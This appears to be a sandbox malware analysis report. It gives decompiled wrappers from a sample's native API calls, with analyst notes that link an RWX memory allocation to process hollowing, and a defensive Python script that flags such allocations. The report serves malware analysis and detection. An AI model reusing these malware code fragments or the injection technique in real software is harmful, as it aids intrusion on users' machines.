                                                    			E00409B50(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
                                                    				char* _v8;
                                                    				struct _EXCEPTION_RECORD _v12;
                                                    				struct _OBJDIR_INFORMATION _v16;
                                                    				char _v536;
                                                    				void* _t15;
                                                    				struct _OBJDIR_INFORMATION _t17;
                                                    				struct _OBJDIR_INFORMATION _t18;
                                                    				void* _t31;
                                                    				void* _t32;
                                                    				void* _t33;
                                                    
                                                    				_v8 =  &_v536;
                                                    				_t15 = E0041AF90( &_v12, 0x104, _a8);
                                                    				_t32 = _t31 + 0xc;
                                                    				if(_t15 != 0) {
                                                    					_t17 = E0041B3B0(__eflags, _v8);
                                                    					_t33 = _t32 + 4;
                                                    					__eflags = _t17;
                                                    					if(_t17 != 0) {
                                                    						E0041B630(__ebx,  &_v12, 0);
                                                    						_t33 = _t33 + 8;
                                                    					}
                                                    					_t18 = E00419730(_v8);
                                                    					_v16 = _t18;
                                                    					__eflags = _t18;
                                                    					if(_t18 == 0) {
                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                    						return _v16;
                                                    					}
                                                    					return _t18;
                                                    				} else {
                                                    					return _t15;
                                                    				}
                                                    			}

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
                                                    • Instruction ID: afa3cb2b82f763e4c143b2584a44dcb3567b2da14c64915af70a02bec35298af
                                                    • Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
                                                    • Instruction Fuzzy Hash: 1B0152B5D0020DABDB10DAA1DD42FDEB378AB54308F0041AAE918A7281F634EB54CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 252 4185f0-418641 call 4191f0 NtCreateFile
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 255 418642-41864d 256 41860b-418641 NtCreateFile 255->256 257 41864f 255->257
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction ID: 4edb876a31e947ab0c02694570741f517bd03378cb2f4498f26c29c628b4aa59
                                                    • Opcode Fuzzy Hash: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction Fuzzy Hash: 6CF05EB2605144AFDB04CF98D980CDB77BDAF8C350714864DF94DD7205C634E801CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 258 4187cb-41880d call 4191f0 NtAllocateVirtualMemory
                                                    C-Code - Quality: 79%
                                                    			E004187CB(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    				void* _t23;
                                                    
                                                    				// Analyst note: this entry lies 5 bytes before the real routine E004187D0 (0x4187d0).
                                                    				// The decoder reads the padding bytes as an 'sbb' whose disp32 (80 F4 55 8B) swallows
                                                    				// the 55 8B of the push ebp / mov ebp, esp prologue at 0x4187d0, which is why the
                                                    				// bogus __edx parameter and the _t10 temporary appear. Use E004187D0 as the
                                                    				// authoritative listing of this wrapper; the body below is otherwise identical to it.
                                                    				asm("sbb [ebx-0x74aa0b80], bl");
                                                    				_t10 = _a4;
                                                    				_t3 = _t10 + 0xc60; // 0xca0
                                                    				E004191F0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}





                                                    0x004187cc
                                                    0x004187d3
                                                    0x004187df
                                                    0x004187e7
                                                    0x00418809
                                                    0x0041880d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 79c3af1193ff1e2b57c7f02acaddb116459a30812e5dc8473a3119e805696343
                                                    • Instruction ID: 6f6f66c420e0c48cba723085a2a6e8f894150d1d44e5b27eee268e6ee1ff7d92
                                                    • Opcode Fuzzy Hash: 79c3af1193ff1e2b57c7f02acaddb116459a30812e5dc8473a3119e805696343
                                                    • Instruction Fuzzy Hash: 85F058B5200108ABCB14CF99CC90EE77BA8AF88254F00825DFA0897241C230E814CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 261 4187d0-4187e6 262 4187ec-41880d NtAllocateVirtualMemory 261->262 263 4187e7 call 4191f0 261->263 263->262
                                                    C-Code - Quality: 100%
                                                    			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    				void* _t21;
                                                    
                                                    				// Wrapper pattern shared by the NtAllocateVirtualMemory and NtClose stubs on this page:
                                                    				// E004191F0 is first called with a per-API (offset, length) pair taken from the
                                                    				// context block in _a4 (0xc60/0x30 here, 0xc50/0x2c for NtClose), then the caller's
                                                    				// arguments are passed straight through to the native API. The stack snapshot at
                                                    				// 0x418809 carries the pair 0x3000/0x40, which decodes as MEM_COMMIT|MEM_RESERVE with
                                                    				// PAGE_EXECUTE_READWRITE: an RWX allocation, consistent with the process hollowing
                                                    				// flagged in this report's signatures.
                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                    				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}





                                                    0x004187df
                                                    0x004187e7
                                                    0x00418809
                                                    0x0041880d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E0041871A(void* _a4) {
                                                    				intOrPtr _v0;
                                                    				long _t8;
                                                    				void* _t11;
                                                    
                                                    				// Analyst note: this entry lies 6 bytes before the real routine E00418720 (0x418720).
                                                    				// The 'push ds' and the 'ror' are decoded from pre-function bytes; the ror's
                                                    				// displacement and immediate (FE 53 CA 55 8B) swallow the 55 8B of the push ebp /
                                                    				// mov ebp, esp prologue at 0x418720. The shifted parameter list (_v0 is really _a4
                                                    				// of E00418720, _a4 here is its _a8) follows from that misalignment; use E00418720.
                                                    				_push(ds);
                                                    				asm("ror byte [ebp+0x55ca53fe], 0x8b");
                                                    				_t5 = _v0;
                                                    				_t2 = _t5 + 0x10; // 0x300
                                                    				_t3 = _t5 + 0xc50; // 0x409773
                                                    				E004191F0(_t11, _v0, _t3,  *_t2, 0, 0x2c);
                                                    				_t8 = NtClose(_a4); // executed
                                                    				return _t8;
                                                    			}






                                                    0x0041871a
                                                    0x0041871b
                                                    0x00418723
                                                    0x00418726
                                                    0x0041872f
                                                    0x00418737
                                                    0x00418745
                                                    0x00418749

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: b2021938b182c0061c6cfed2ca3d905344e31e54a27a8be7faff85f3049b4d8d
                                                    • Instruction ID: 033e3eae8491c448c814c9b8cc424ed027314fb1eabbe8a6d0e5cdda3b8ff964
                                                    • Opcode Fuzzy Hash: b2021938b182c0061c6cfed2ca3d905344e31e54a27a8be7faff85f3049b4d8d
                                                    • Instruction Fuzzy Hash: A6E08C752002046BDB11DFA8CC88EE73F18EF88320F144299BE689B292C131A640C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418720(intOrPtr _a4, void* _a8) {
                                                    				long _t8;
                                                    				void* _t11;
                                                    
                                                    				_t5 = _a4;
                                                    				_t2 = _t5 + 0x10; // 0x300
                                                    				_t3 = _t5 + 0xc50; // 0x409773
                                                    				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                    				_t8 = NtClose(_a8); // executed
                                                    				return _t8;
                                                    			}





                                                    0x00418723
                                                    0x00418726
                                                    0x0041872f
                                                    0x00418737
                                                    0x00418745
                                                    0x00418749

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
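Added example (not part of the Joe Sandbox report or of the sample's code): a Python helper that parses the "APIs" lines shown in the NtCreateFile, NtAllocateVirtualMemory and NtClose listings above and decodes the allocation-type and page-protection constants carried in the NtAllocateVirtualMemory stack snapshot. The three input lines are copied from this page; the MEM_* and PAGE_* tables are the documented Windows constants. The adjacent-pair search in find_alloc_pair() is this example's own assumption: a Joe Sandbox argument list is a raw stack snapshot, so positions are not guaranteed to line up with the Nt* prototype and the code does not rely on a fixed index.

```python
"""Decode Joe Sandbox 'APIs' lines such as the ones in the listings above.

Constructed example for this page, not code from Joe Sandbox or from the
sample. The MEM_* / PAGE_* values are the documented Windows constants; the
adjacent-pair search in find_alloc_pair() is an assumption of this example,
made because a Joe Sandbox argument list is a raw stack snapshot whose
positions need not line up with the NtAllocateVirtualMemory prototype.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: the three API lines copied from the listings on this page.
SAMPLE_LINES = [
    "NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,"
    "FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D",
    "NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,"
    "00003000,00000040,00000000,00000000,00408B23), ref: 00418809",
    "NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745",
]

API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# NtAllocateVirtualMemory AllocationType bits (winnt.h).
MEM_FLAGS: Dict[int, str] = {
    0x00001000: "MEM_COMMIT",
    0x00002000: "MEM_RESERVE",
    0x00080000: "MEM_RESET",
    0x00100000: "MEM_TOP_DOWN",
    0x00400000: "MEM_PHYSICAL",
    0x20000000: "MEM_LARGE_PAGES",
}
MEM_MASK = sum(MEM_FLAGS)  # distinct single bits, so the sum is their OR

# Page protection: one base value in the low byte, optional modifier bits above it.
PAGE_BASE: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS: Dict[int, str] = {
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}


def parse_api_line(line: str) -> dict:
    """Split 'Api.Module(a,b,?,...), ref: ADDR' into its parts. A '?' is a stack
    slot the sandbox could not read and becomes None."""
    m = API_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    raw = m["args"]
    args: List[Optional[int]] = []
    if raw:
        args = [None if tok == "?" else int(tok, 16) for tok in raw.split(",")]
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def decode_mem_flags(value: int) -> List[str]:
    names = [name for bit, name in MEM_FLAGS.items() if value & bit]
    unknown = value & ~MEM_MASK
    if unknown:
        names.append(hex(unknown))  # keep undecoded bits visible instead of dropping them
    return names


def decode_protect(value: int) -> List[str]:
    names = [PAGE_BASE.get(value & 0xFF, hex(value & 0xFF))]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return names


def is_writable_executable(protect: int) -> bool:
    return (protect & 0xFF) in (0x40, 0x80)


def find_alloc_pair(args: List[Optional[int]]) -> Optional[Tuple[int, int]]:
    """Heuristic (assumption of this example): Protect sits right after
    AllocationType in the argument block, so take the first adjacent pair whose
    left value consists only of MEM_* bits and whose right value has a valid
    PAGE_* base. Returns None when the snapshot holds no such pair."""
    for left, right in zip(args, args[1:]):
        if left is None or right is None:
            continue
        if left and (left & ~MEM_MASK) == 0 and (right & 0xFF) in PAGE_BASE:
            return left, right
    return None


def triage(lines: List[str]) -> List[dict]:
    """One finding per NtAllocateVirtualMemory line with a decodable
    (AllocationType, Protect) pair; other APIs are parsed but not reported."""
    findings = []
    for line in lines:
        rec = parse_api_line(line)
        if rec["api"] != "NtAllocateVirtualMemory":
            continue
        pair = find_alloc_pair(rec["args"])
        if pair is None:
            continue
        alloc, prot = pair
        findings.append({
            "ref": rec["ref"],
            "allocation_type": decode_mem_flags(alloc),
            "protect": decode_protect(prot),
            "rwx": is_writable_executable(prot),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        flag = "RWX" if f["rwx"] else "   "
        print(f"{flag} ref=0x{f['ref']:08X} "
              f"{'|'.join(f['allocation_type'])} {'|'.join(f['protect'])}")
```

Run against the three lines above, triage() reports a single finding at ref 0x418809 that decodes as MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE and is flagged RWX; the NtCreateFile and NtClose lines parse but produce no finding. When a snapshot has a "?" in either slot of the pair the function returns no pair rather than guessing, which is the safer failure mode for a triage script.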

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
